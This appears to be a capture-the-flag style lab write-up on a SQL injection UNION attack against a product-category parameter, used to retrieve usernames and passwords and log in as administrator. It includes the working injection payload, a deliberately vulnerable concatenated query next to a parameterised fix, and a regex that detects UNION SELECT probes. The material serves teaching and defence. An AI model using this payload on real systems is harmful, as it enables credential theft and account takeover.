09 - SQL injection UNION attack, retrieving data from other tables
The database contains a different table called users, with columns called username and password.
To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.
Given: injection point (product category), table name (users), columns (username, password)
End goal: log in as the administrator user
Since we already know the table name, the column names and the username (administrator), the password can be retrieved with the following injected query: 'UNION+SELECT+username,password+FROM+users--
The response is 200 OK, which means the injection worked; if it had not worked, we would first have to determine the number of columns returned by the original query.
The output lists all the usernames together with their passwords.
Now go to My account and log in with the administrator credentials to solve the lab.
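The same behaviour reproduced locally, as an added example that is not part of the lab or this write-up: the string-concatenated category query that the lab models beside a parameterised version, plus a check that flags a UNION SELECT probe in a request parameter. The in-memory SQLite tables, the product row and the placeholder password are all constructed for the example.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

def build_db():
    # Constructed in-memory stand-in for the lab's database; the password is a placeholder.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (name TEXT, description TEXT, category TEXT, released INTEGER);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO products VALUES ('Widget', 'A small gift', 'Gifts', 1);
        INSERT INTO users VALUES ('administrator', 'PLACEHOLDER-PASSWORD'), ('wiener', 'peter');
    """)
    return conn

def vulnerable_lookup(conn, category):
    # The category parameter is concatenated into the SQL text, so a quote in the
    # input closes the string literal and the remainder is parsed as SQL (the lab's bug).
    sql = ("SELECT name, description FROM products WHERE category = '"
           + category + "' AND released = 1")
    return conn.execute(sql).fetchall()

def hardened_lookup(conn, category):
    # Parameterised query: the input is bound as a value and never parsed as SQL,
    # so the same payload simply matches no category and returns nothing.
    sql = "SELECT name, description FROM products WHERE category = ? AND released = 1"
    return conn.execute(sql, (category,)).fetchall()

# Detection side: flag a request parameter carrying a UNION SELECT clause.
# The parameter arrives URL-encoded ('+' for spaces), so decode it before matching.
UNION_PROBE = re.compile(r"\bunion\b\s+(all\s+)?select\b", re.IGNORECASE)

def looks_like_union_probe(raw_param):
    return UNION_PROBE.search(unquote_plus(raw_param)) is not None

if __name__ == "__main__":
    conn = build_db()
    payload = "Gifts' UNION SELECT username, password FROM users--"
    print("vulnerable:", vulnerable_lookup(conn, payload))  # product row plus users rows
    print("hardened:  ", hardened_lookup(conn, payload))    # []
    print("flagged:   ", looks_like_union_probe("Gifts'+UNION+SELECT+username,password+FROM+users--"))
```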
Lab solved.